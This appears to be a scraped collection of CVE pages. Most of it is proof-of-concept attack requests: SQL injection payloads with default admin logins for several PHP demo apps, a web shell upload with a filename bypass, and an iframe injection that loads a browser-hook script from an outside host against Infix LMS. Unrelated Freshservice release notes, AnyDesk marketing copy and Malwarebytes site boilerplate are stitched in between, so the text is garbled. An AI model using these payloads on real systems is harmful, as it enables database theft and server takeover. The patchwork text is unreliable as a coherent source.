Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /employees/manage_leave_type.php.

Permalink

Cannot retrieve contributors at this time

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Zhang Huaiyu

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /leave\_system/admin/employees/manage\_leave\_type.php?id

Vulnerability location: /leave\_system/admin/employees/manage\_leave\_type.php?id=,id

dbname=leave\_db,length=8

\[+\] Payload: /leave\_system/admin/employees/manage\_leave\_type.php?id=11%27%20and%20length(database())%20=8--+ // Leak place ---> id

GET /leave\_system/admin/employees/manage\_leave\_type.php?id\=11%27%20and%20length(database())%20\=8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

length=8 

length=9

CVE-2022-38303: bug_report/SQLi-2.md at main · GGMMNN/bug_report

FreshService Windows Agent < 2.11.0 and FreshService macOS Agent < 4.2.0 and FreshService Linux Agent < 3.3.0. are vulnerable to Broken integrity checking via the FreshAgent client and scheduled update service.

**Important update:** We have updated the release timelines of “**Android mobile updates**” on 18th May 2022. This enhancement will be available on 01st Jun' 22 instead of 29th Apr’22.

**Note**: All the features/enhancements below will be available on Blossom, Starter, Garden, and Growth plans on Apr 18th. For Estate, Pro, Forest, and Enterprise plans will be available on Apr 29th.

Product version: 2022.R04L.01

**New Features and Enhancements******Reduce MTTR using Automated Grouping for Alerts****

**Category:** IT Operations Management

Users can now use ML-driven Automated Grouping – now in Public Beta – to attach related incoming alerts to open incidents. This would make incidents contextually rich, reduce noise, and help resolve incidents faster.

More details here

****Gain Flexibility in Noise Reduction by Grouping Alerts using more Values****

**Category:** IT Operations Management

Users can now group alerts by Message & Node in addition to the default values of Resource and Metric in any combination through custom integration. More details here

**  
**Integrate Monitoring Tools in just three simple steps****

**Category:** IT Operations Management

Users can now integrate monitoring tools to Freshservice Alert Management in just three steps. The alert profile is being retired and users can view all their integrations on the Alert Integrations page. More details here

**  
**Detect and Correct Invalid Phone Numbers with Ease****

**Category:** IT Operations Management

Users will now be intimated about missing or incorrectly formatted agent phone numbers as and when they create a shift for On-Call Management. Users can either correct individual phone numbers from within the On-Call Management module, or correct them en masse through a CSV file. More details here

****Get Separate Notifications for Urgent and High Priority Incidents** **

**Category:** IT Operations Management

Users can now configure the escalation path and notification rules for High and Urgent priority incidents separately in On-Call Management. More details here

**  
**Business Impact for Change****

**Category:** IT Service Management

The Change managers and implementers can now proactively associate ‘Impacted Services of a Change’ and automate approvals based on the ‘impact’. This will eventually reduce the number of unplanned outages to business-critical services.

More details here

**  
**Increased Size of the Email Attachment****

**Category:** IT Service Management

We have increased the limit of email attachment files from 25MB to 40MB. Users can now share and receive bigger files in their tickets, problem, change, release, and project modules experiencing an enhanced sharing option.

****New Metrics - Unresolved Tickets****

**Category:** IT Service Management

Introducing a new metric called Unresolved Tickets, in the tickets module, to track the total number of unresolved tickets in any defined time period. Users can now analyze unresolved tickets for a period by defining a time period and comparing trends across different time periods (month over month, week over week, etc.)

****Conditional Fields in Tabular Data****

**Category:** IT Service Management

Users can now access service item fields and asset type-specific fields in tabular format when those fields are applied in the metrics filter. Just add the conditional field in filters and click on the View underlying data option to view the conditional fields.

****Edit Gantt bars in Project List View****

**Category:** Project Management

Users can now quickly change the start and end dates of a project in the Projects list view page itself. Click and drag either end of the Gantt bar to make edits to the project. The icon will change to a double-headed arrow indicating editing. The change (in days) will be reflected at the end of the Gantt bar once it is released.

**Note:** The start and/or end date  changes will only reflect at the project level and will not impact the dates of tasks/sub-tasks

****Manage and Optimize SaaS usage better with User Filters****

**Category:** IT Asset Management

An integral part of managing and optimizing your SaaS applications would be understanding app usage on a user level based on varied criteria. With filters for SaaS users, slice and dice through user-level SaaS usage by filtering using User fields and using Ready-to-view filters. More details here

**  
**Discover and manage Microsoft 365 licenses** **

**Category:** IT Asset Management

Understanding how your licenses are utilized enables you to plan the best optimization efforts to cut SaaS costs. With your Microsoft 365 integration, get visibility into all your licenses and their utilization right within Freshservice. More details here

**Note:** Auto-discovered license utilization information will be available on the overview tab. All manually created licenses will be available as contracts. 

****Create Relationships with your Software in your Inventory****

**Category:** IT Asset Management

Understanding dependencies between your hardware and software is important to see the big picture when critical issues arise. You can now create software relationships with all inventory items and track them under the relationship tab for any software.

**Note:** To better search through your software records, use the software statuses (Managed, Discovered, Disabled, In review, Restricted, Ignored).

****Create and Manage Warranties at ease****

**Category:** IT Asset Management

Warranties are critical documents required to secure asset costs and an asset’s lifecycle. With the contract management module, create warranties and automate approvals right from Freshservice.

**  
**Stay on top of Software usage with the Analytics Module****

**Category:** IT Asset Management

Getting a bird’s eye view of your software usage is critical in establishing software governance in enterprises. With software reports in Freshservice analytics, you can now track software used based on varied criteria like status, users, asset, source of creation, and more.

**Note:** This will be rolled out in phases from April 30th.

****Workflow Automator Enhancements****

**Category:** Workflows/Automation

*   **Expression Builder Node**

Users can now perform operations like adding numbers together, replacing a part of a string of text, comparing strings, manipulating date/date-time fields, and much more using the Expression builder node. For eg: Calculate the due date of a ticket based on the employee’s joining date. More info

here

*   **Expressions in Condition Node**

Users can now evaluate boolean expressions directly from the condition node allowing them to craft more complex conditions.

*   **Date fields in Condition and Actions** 

Both default and custom date fields are now available to use within the condition and action nodes. 

*   **ISO Date placeholders**

Date fields are now available in ISO format from the placeholder section. Use this format when constructing date-based expressions in the expression builder node and integrating with 3rd party systems via APIs. Sample formats for date and DateTime fields are mentioned below:

ISO Date (yyyy-mm-dd) -    ‘2022-01-02’

ISO DateTime (yyyy-mm-ddThh:mm:ssZ) -    ‘2022-01-02T12:24:30Z’

*   **Test Improvements for App Actions, Webhooks and Web Requests**

Testing web requests, app actions, and webhooks just got easier. Now replace placeholders with sample values to test these actions seamlessly.

****Orchestration Center Updates****

**Category:** Workflows/Automation

*   **Integrating Credential Store with Orchestration Apps**

Users can now use the credential store for a curated list of Orchestration apps. For instance, you can create Oauth credentials for Dropbox and leverage them in the new Dropbox orchestration app.

*   **New apps added to Orchestration center:**
    *   **Dropbox** \- Perform operations on users, groups, and files or folders, and attach documents to your Freshservice tickets using the Dropbox Orchestration app. More details here.  
         
*   **Orchestration App Enhancements**
    *   **Microsoft Active Directory-** Remove users from multiple groups using MS Active directory for Orchestration. More details here 
    *   **MS Exchange -** Perform lookup events based on start\_date\_time and end\_date\_time filter. More details here.

****Security updates: Discovery Probe and Discovery Agent****

Enabled the following fixes for the asset discovery tools:

*   **Security fix, checksum hash verification on Auto Update**
    

Mac agent 4.2.0, Windows agent 2.11.0, Linux agent 3.3.0

*   **Ability to Fetch instance ID for AWS & Azure virtual machines**
    

Windows agent 2.11.0, Linux agent 3.3.0

*   **Security fix, added TLS certificate verification**
    

Mac agent 4.4.0, Windows agent 2.12.0, Linux agent 3.4.0, Probe 4.11.0  
 

****Mobile App Updates****

**iOS:**

*   Support for Look-up Fields in Ticket module
    

**Android:**

*   Support for Look-up Fields in Ticket module
    
*   Support for Change form Business Rules
    
*   Support for Service item Business Rules
    

**Note:** These enhancement will be available from 01st June 2022. 

****Other updates****

**Mac agent 4.3.0**

*   Fixed bugs in fetching software details from MacOS Monterey
    
*   Added new mac models in our directory to reflect the model names
    

**Probe 4.11.0**

*   Fixed bugs in fetching software details from MacOS Monterey
    
*   Added new mac models in our directory to reflect the model names
    
*   Fixed discovery agent version issue in the software details  
     
    

****Neo Admin Center:** Create Custom URL**

**Category:** Platform

Personalizing Freshworks URL as per brand requirements 

Admins can now personalize their login URL as per branding requirements. They can do this from within the Organization module of the Neo Admin Center.

Note: They’ll have to create a DNS CName certificate record and process this step from the DNS Zone file while updating the URL in the organization module. 

More details here

CVE-2022-36174: Freshservice Release Notes - April 2022 | Freshworks Community

Garage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /garage/editclient.php.

**Garage Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author:Broccoli

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /garage/editclient.php?id=

Vulnerability location: /garage/editclient.php?id=, id

dbname = garagedb

\[+\] Payload: /garage/editclient.php?id=-1%27+union+select+1,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /garage/editclient.php?id\=\-1%27+union+select+1,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=m6rramo7f8jalaggbvjh84b1mm
Connection: close

CVE-2022-38610: bug_report/SQLi-2.md at main · sunaono1/bug_report

Garage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /garage/editcategory.php.

Permalink

**Garage Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Broccoli

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /garage/editcategory.php?id=

Vulnerability location: /garage/editcategory.php?id=, id

dbname = garagedb

\[+\] Payload: /garage/editcategory.php?id=-1%27+union+select+1,database(),3,4--+ // Leak place ---> id

GET /garage/editcategory.php?id\=\-1%27+union+select+1,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=m6rramo7f8jalaggbvjh84b1mm
Connection: close

CVE-2022-38606: bug_report/SQLi-1.md at main · sunaono1/bug_report

Church Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/edit_event.php.

Permalink

**Church Management System v1.0 by Godfrey De Blessed has SQL injection**

BUG\_Author: Broccoli

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/11206/church-management-system.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /cman/admin/edit\_event.php?id=

Vulnerability location: /cman/admin/edit\_event.php?id=, id

dbname = cman

\[+\] Payload: /cman/admin/edit\_event.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /cman/admin/edit\_event.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

CVE-2022-38605: bug_report/SQLi-1.md at main · sunaono1/bug_report

An issue was discovered in AnyDesk before 6.2.6 and 6.3.x before 6.3.3. An unnecessarily open listening port on a machine in the LAN of an attacker, opened by the Anydesk Windows client when using the tunneling feature, allows the attacker unauthorized access to the local machine's AnyDesk tunneling protocol stack (and also to any remote destination machine software that is listening to the AnyDesk tunneled port).

*   Windows
    
*   macOS
    
*   Android
    
*   iOS
    
*   Linux
    
*   FreeBSD
    
*   Raspberry Pi
    
*   Chrome OS
    

Discover AnyDesk for Windows

*   Lightly designed.
*   Smooth Remote Desktop connections.
*   Easy Online Remote Collaboration.
*   Compatible with earlier Windows versions.
*   Always free updates.

Download Now

**Highlights**

**Dynamic performance**

Establish seamless Remote Desktop connections in Windows and offer excellent Remote Support to your customers with the help of thought-through features.

Subscribe Now

**Flexibility**

Customize AnyDesk with your own brand and logo to highlight your corporate identity. Easily administrate all settings and configurations in Windows.

Subscribe Now

**Compatibility**

AnyDesk is not only compatible with Windows 10 and older. You can also establish connections with many other operating systems and their various versions, including iOS, macOS, Linux and Android.

Subscribe Now

Tutorial: An easy installation guide

**AnyDesk on any platform**

  

 To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video

**Do you need more information? Our online Help Center provides all the answers.**

Help Center

**Interested in the most relevant changes in our latest AnyDesk version?**

Learn More

**Trusted by over 100,000 customers**

**More features**

**Administration**

AnyDesk facilitates managing your Remote Desktop contacts and connections. You can administrate all settings and configurations in Windows with Group Policies. Focus on your projects rather than their administration.

Learn More

**Security**

Thanks to TLS 1.2 encryption technology and incessant verification of connections, AnyDesk ensures end-to-end privacy and protects your data. Only authorized desks can demand Remote Access to your device via AnyDesk.

Learn More

**On-Premises**

You can establish an autonomous, private network that fully shields your data while operating Windows Remote Desktops with AnyDesk On-Premises. All information remains within your own network.

Learn More

CVE-2021-44425: Remote Desktop Software for Windows – AnyDesk

Infix LMS version 4.3.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Infix LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608# Version: 4.3.0# Tested on Ubuntu 18.04sign up as teachergo profile page and try to upload profile picwith bypass name restriction on post request with burp or etc, upload b374k with burp or else -------Request-----------POST /profile-update HTTP/1.1Host: localhostContent-Length: 102201Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzjX6L4V6hVC4KIECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/profile-settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijhpc05lZDlpcElOM1ZJZ0sxZDBXSUE9PSIsInZhbHVlIjoiVXRsZGNUNVlGWXY5RVpxTDVPK08wQW5TK05RMmUvRUVYKzQ0L0R0cHpyZmhmUFFHVm04ZWo2UVVUYkNuYm15c3RrcUlzQnJySnBWUHdHOGF6NkVneUNibDZxbEc1MytrWVRzVDVhaDNOYjN1ZGI1aHFEd3B2VXgrczZrUjEzR2QiLCJtYWMiOiJkNTZmNTU3YzU0NzJlNzJhMWIwMWNmMDhjMjI2ZTEzZjgwMDY0Mzk1ZjRiMWNhZjczZjhmNTQyN2NiNWZhMTdjIiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6InBSSllCaHF1UFlLS0dpT3RYaHRkRkE9PSIsInZhbHVlIjoiYlI3ak1obGtEa1hiV1hhOEF4V2Y1RjVTQmJHVjdvRmUrRmM0aE4wcElycHRCWnNVeG5LSVJBb3A1SDBXaU9mUzZTZ2EvSDZTZ00vRmZUbXZXZ2UzK3BsMlRJVDlJSThpRGc0SEEvZmh5cmtHSkhDWGNTOCtEcFdkaGEwdjhpOHAiLCJtYWMiOiI0NjJhMTRjNjIyMWQyM2MxZDliOGIzYjNmZmQ5YjA1YWVmYjUzZjhjMmI2MjAwNTFiZGNlN2RiMmUyMzhlZDFhIiwidGFnIjoiIn0%3DConnection: close------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="_token"0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="name"Teacher------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="email"teacher@infixedu.com------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="phone"01711223345------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="country"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="city"1374------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="zip"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="currency"112------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="language"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="facebook"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="twitter"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="linkedin"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="instagram"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="short_details"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="about"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="image"; filename="shell.php.jpg.php"Content-Type: image------b374kshell content-----------WebKitFormBoundaryzjX6L4V6hVC4KIEC--

Infix LMS 4.3.0 Shell Upload

Infix LMS version 4.3.0 suffers from an iframe injection vulnerability.

# Exploit Title: Infix LMS - Learning Management System IFRAME Injection 
# Exploit Author: th3d1gger 
# Vendor Homepage: https://codecanyon.net 
# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608 
# Version: 4.3.0 
# Tested on Ubuntu 18.04 
sign up as teacher 
go course page and try to add course or edit 
with bypass special char restrict on post request with burp or etc, inject iframe with beef hook or else on any note-editor field

--request-- 
POST /admin/course/updateCourse HTTP/1.1 
Host: localhost 
Content-Length: 3855 
Cache-Control: max-age=0 
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" 
sec-ch-ua-mobile: ?0 
sec-ch-ua-platform: "Linux" 
Upgrade-Insecure-Requests: 1 
Origin: http://localhost 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydcMGShie2VwdqOn2 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Sec-Fetch-Site: same-origin 
Sec-Fetch-Mode: navigate 
Sec-Fetch-User: ?1 
Sec-Fetch-Dest: document 
Referer: http://localhost/admin/course/course-details/7?type=courseDetails 
Accept-Encoding: gzip, deflate 
Accept-Language: en-US,en;q=0.9 
Cookie: XSRF-TOKEN=eyJpdiI6IlhIUjU2U3FiTUMzQzZxT2E0OVVhZ1E9PSIsInZhbHVlIjoiRDBWUnFuakRhbTlHMStIb0xaRGp3YndQY3lla0RWcjZ2N3VyUUZMUzU1M004azBNNFk2QlBQNnJGSzRxWnh3bVppZ1hBcmRaOEV3TWd0L2V3R3FXcTZTQVpMQWxFSXQvOE00a3NZK0tjaDNqNzJ4ckdQc2psN2tMUzJaK3kzaDgiLCJtYWMiOiIxMjNjZTExZGE1MzUzNmQ0ZGMxMzk3Y2Y5NmEwMjZjNjdhZDEyNDU5ODYwYTVhZTZjM2UwN2VhNzZiMGY0OTI5IiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6Im1hSEwwZ3ZlbGJUVGpqTFJLSEdkOGc9PSIsInZhbHVlIjoiSUNJbDZMbmNLSWVlWm1OU3BqYVpYYTkzK3BVN0xxaG1qZnpCVis1TjAwd1FRV3RKUlRNbGdleUhaUWRpdXMwTmxtMFJjc3BTUTV2Ty9zLzkyTWZBckpRTUlsVEc1dmlVbzRwOHRhdW1nSWpNdkRnbmNUMGFqZFUyVml2UDBDclMiLCJtYWMiOiIzZjBmNjVlNDg0MjFmN2NiYjI3ZmIxNmM0YjlkMjE1MGZjZTVlN2Y5N2JmYTcwOWM1ZDA2ZmU4MzIzYzI2YTExIiwidGFnIjoiIn0%3D 
Connection: close

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="_token"

0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="type"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="drip"

0 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="title"

Introduction to Programming and App Development 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="id"

7 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="requirements"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="about"

 <iframe src="http://192.168.1.18:3000/uploads/test.html"><div> </div> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text 
 ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="outcomes"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="category"

4 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="sub_category"

7 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="mode_of_delivery"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="quiz"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="level"

2 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="language"

19 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="duration"

10 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="complete_order"

0 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="price"

20 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="is_discount"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="discount_price"

10 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="host"

Youtube 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="trailer_link"

https://www.youtube.com/watch?v=mlqWUqVZrHA 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="vimeo"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="vdocipher"

https://www.youtube.com/watch?v=mlqWUqVZrHA 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="file"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="scope"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="image"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundarydcMGShie2VwdqOn2--

Infix LMS 4.3.0 IFRAME Injection

Categories: News
The most important and interesting computer security stories from the last week.



(Read more...)




The post A week in security (September 5 – 11) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

Privacy VPN

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (September 5 – 11)

In Library Management System 1.0 the /card/in-card.php file id_no parameters are vulnerable to SQL injection.

    POST /LMS/card/id-card.php HTTP/1.1
    Host: 172.20.10.14
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
    Content-Length: 112
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: zh-CN,zh;q=0.9
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=8l03mutpmr44pg0gv96afbujmn
    Origin: http://172.20.10.14
    Referer: http://172.20.10.14/LMS/card/id-card.php
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip
    
    id_no=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b707171,0x686a467041767a434e5574435a446348437562755059707141736f7047694178686e787163596d6e,0x717a6a7a71),NULL#&search=

CVE-2022-37794: CVE_demo/Library Management System with QR code Attendance and Auto Generate Library Card - SQL injections.md at main · anx0ing/CVE_demo

Tag

#windows